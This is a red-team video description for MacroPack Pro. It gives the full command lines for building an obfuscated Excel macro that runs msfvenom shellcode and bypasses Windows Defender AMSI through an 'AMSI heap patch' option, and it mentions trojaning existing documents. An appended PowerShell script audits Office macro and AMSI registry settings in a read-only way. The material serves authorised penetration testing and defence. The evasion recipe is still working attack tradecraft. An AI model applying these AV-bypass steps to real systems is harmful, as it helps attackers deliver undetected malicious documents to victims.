
Redteam: Bypass AMSI in Excel Macro using MacroPack Pro

This video shows one of the multiple ways MacroPack Pro can be used to bypass AMSI.
In this case, the payload loads a raw shellcode that runs calc, generated with msfvenom.
This payload, and any document running it, is considered malicious by default.

In the video I first show that the obfuscated payload is detected by Windows Defender AMSI.

This first payload is generated with:
echo x32calc.bin | macro_pack.exe -t SHELLCODE -o -G samples\sc.xls
(the -o option means the payload is obfuscated, but obfuscation alone is not enough against AMSI)

Next I show the command line used to list some of the AMSI bypass methods available in MP Pro.
This command is:
macro_pack.exe --listamsibypass

Finally I choose the second AMSI method to generate a new payload which bypasses AMSI.
Here is the command line used to generate the payload:
echo x32calc.bin | macro_pack.exe -t SHELLCODE -o -G samples\sc_bypass.xls --av-bypass --amsibypass=2

The -o option is used to obfuscate the payload.
--av-bypass is the specific option used for advanced AV bypass.
--amsibypass=2 corresponds to the "AMSI heap patch" method.
The -G option is used to generate a new file (-T could also be used to trojan an existing document).

The base VBA code is the MacroPack SHELLCODE template which is used to run a given raw shellcode.
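As the defender's counterpart to the video, here is an added PowerShell check that is not part of the video or of the MacroPack project: a read-only audit of the Office settings that decide whether a VBA macro like the one above is blocked outright or handed to AMSI before it runs. The 16.0 registry hive, the policy/user key layout and the value meanings are taken from Microsoft's Office security policy documentation as I recall them and should be treated as assumptions to verify against your own Office build.

```powershell
# Added example, not from the video or the MacroPack project: a read-only audit of the
# Office settings that decide whether a VBA macro such as the one in the video is
# blocked outright or handed to AMSI before it runs. Nothing is modified.
# Assumptions: Office hive 16.0 (Microsoft 365 Apps / Office 2016-2019) and the value
# names and meanings from Microsoft's Office security policy documentation.

$OfficeVersion = '16.0'   # assumption: adjust for other Office builds

# Documented meanings of the two enumerated settings.
$VbaWarningsMeaning = @{
    1 = 'Enable all macros (unsafe: a document like the one in the video runs unprompted)'
    2 = 'Disable all macros with notification'
    3 = 'Disable all macros except digitally signed'
    4 = 'Disable all macros without notification'
}
$ScanScopeMeaning = @{
    0 = 'AMSI macro runtime scanning disabled'
    1 = 'Scan macros only in low-trust documents (documented default)'
    2 = 'Scan macros in all documents'
}

function Get-RegValue {
    # Returns the value, or $null when the key or value does not exist.
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Get-EffectiveValue {
    # A Group Policy value under Software\Policies takes precedence over the
    # user preference under Software\Microsoft; $Default applies when neither is set.
    param([string]$SubKey, [string]$Name, $Default)
    $policy = Get-RegValue "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$SubKey" $Name
    if ($null -ne $policy) { return [int]$policy }
    $user = Get-RegValue "HKCU:\Software\Microsoft\Office\$OfficeVersion\$SubKey" $Name
    if ($null -ne $user) { return [int]$user }
    return $Default
}

function Get-ExcelMacroPosture {
    $scanScope   = Get-EffectiveValue 'Common\Security' 'MacroRuntimeScanScope' 1
    $vbaWarnings = Get-EffectiveValue 'Excel\Security' 'VBAWarnings' 2
    $blockNet    = Get-EffectiveValue 'Excel\Security' 'BlockContentExecutionFromInternet' $null

    $findings = @()
    if ($scanScope -eq 0) {
        $findings += 'MacroRuntimeScanScope=0: AMSI never sees macro code, so even the obfuscated first payload from the video would run unscanned.'
    } elseif ($scanScope -eq 1) {
        $findings += 'MacroRuntimeScanScope=1: trusted documents and trusted locations skip the AMSI scan; consider 2.'
    }
    if ($vbaWarnings -eq 1) {
        $findings += 'VBAWarnings=1: all macros enabled without a prompt.'
    }
    if ($blockNet -ne 1) {
        $findings += 'BlockContentExecutionFromInternet is not 1: no explicit block of macros in files downloaded from the internet.'
    }

    [pscustomobject]@{
        MacroRuntimeScanScope   = $scanScope
        ScanScopeMeaning        = $ScanScopeMeaning[$scanScope]
        ExcelVBAWarnings        = $vbaWarnings
        VBAWarningsMeaning      = $VbaWarningsMeaning[$vbaWarnings]
        BlockMacrosFromInternet = $blockNet
        Findings                = $findings
    }
}

Get-ExcelMacroPosture | Format-List
```

Run it as the user whose Office profile you want to audit; policy values are read before user preferences because that is how Office resolves them. Keeping MacroRuntimeScanScope at 2 and macros from the internet blocked narrows the window in which a bypass of the kind shown in the video matters at all, and Defender's own detection of the first, merely obfuscated payload is only possible when the runtime scan is enabled.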

=========================================================================

MacroPack Pro is a tool for professional pentesters and redteamers.
More information is available at: https://www.balliskit.com
For any inquiry, write to emeric.nasi [at] sevagas.com using a professional email address.

You can also check the limited community open source version here: https://github.com/sevagas/macro_pack
Follow us on Twitter at: https://twitter.com/BallisKit

Video "Redteam: Bypass AMSI in Excel Macro using MacroPack Pro" from the Sevagas channel